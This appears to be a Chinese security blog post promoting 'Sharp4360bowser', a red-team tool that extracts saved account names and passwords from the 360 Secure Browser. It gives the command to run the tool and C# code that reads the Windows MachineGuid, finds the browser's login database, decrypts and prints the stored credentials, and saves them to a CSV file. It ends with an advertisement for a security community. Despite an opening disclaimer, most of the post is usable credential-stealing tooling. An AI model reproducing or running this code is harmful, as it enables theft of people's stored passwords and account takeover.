01阅读须知
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面
02基本介绍
Sharp4360bowser是一款专为360安全浏览器设计的密码抓取和解密工具。它通过下载浏览器数据库并记录密钥,实现离线解密浏览器密码的功能。该工具支持自动运行,并能够将结果导出为CSV文件,方便红队进行进一步分析。
03使用方法
Sharp4360bowser的使用非常简单,只需运行以下命令即可。
sharp4360bowser.exe /auto /csv
Windows11系统,360浏览器版本号:15.1.1441.64(64位)|内核版本: 114.0.5735.289,测试通过,可以正常获取360浏览器记录的账户和密码
04
编码实现
Sharp4360bowser首先通过以下代码获取系统的MachineGuid和360浏览器的数据库路径,具体代码如下所示。
if (flag2)
{
text2 = program.getKey("SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", 2);
text = program.getKey("360SeSES\\DefaultIcon", null, 0).Split(new char[]
{
','
})[0].Replace("360se6\\Application\\360se.exe", "") + "360se6\\User Data\\Default\\apps\\LoginAssis\\assis2.db";
}
Console.WriteLine("current DB {0}", text);
Console.WriteLine("current MachineGuid {0}\n", text2);
获取到数据库路径和MachineGuid后,工具会读取数据库内容,并使用MachineGuid进行解密:
DataTable sqlite3De = program.GetSqlite3De(text, text2);
foreach (object obj2 in sqlite3De.Rows)
{
DataRow dataRow2 = (DataRow)obj2;
Console.WriteLine("{0} {1} {2}", dataRow2["domain"], dataRow2["username"], dataRow2["password"]);
}
最后,Sharp4360bowser可以将解密后的数据导出为CSV文件,便于进一步分析和使用:
if (flag)
{
string text5 = "SafeBrowserPassword_" + DateTime.Now.ToString("yyyyMMddHHmmss") + ".CSV";
Program.DataTableToCsv dataTableToCsv = new Program.DataTableToCsv();
StringBuilder data = dataTableToCsv.ConvertDataTableToCsvFile(sqlite3De);
try
{
dataTableToCsv.SaveData(data, text5);
Console.WriteLine("password File Save to {0}", text5);
}
catch
{
Console.WriteLine("Save csv error!");
}
}
通过简单的命令行操作,即可完成从数据库读取、解密到结果导出的全过程。
05.NET安全星球
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。
20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。
我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
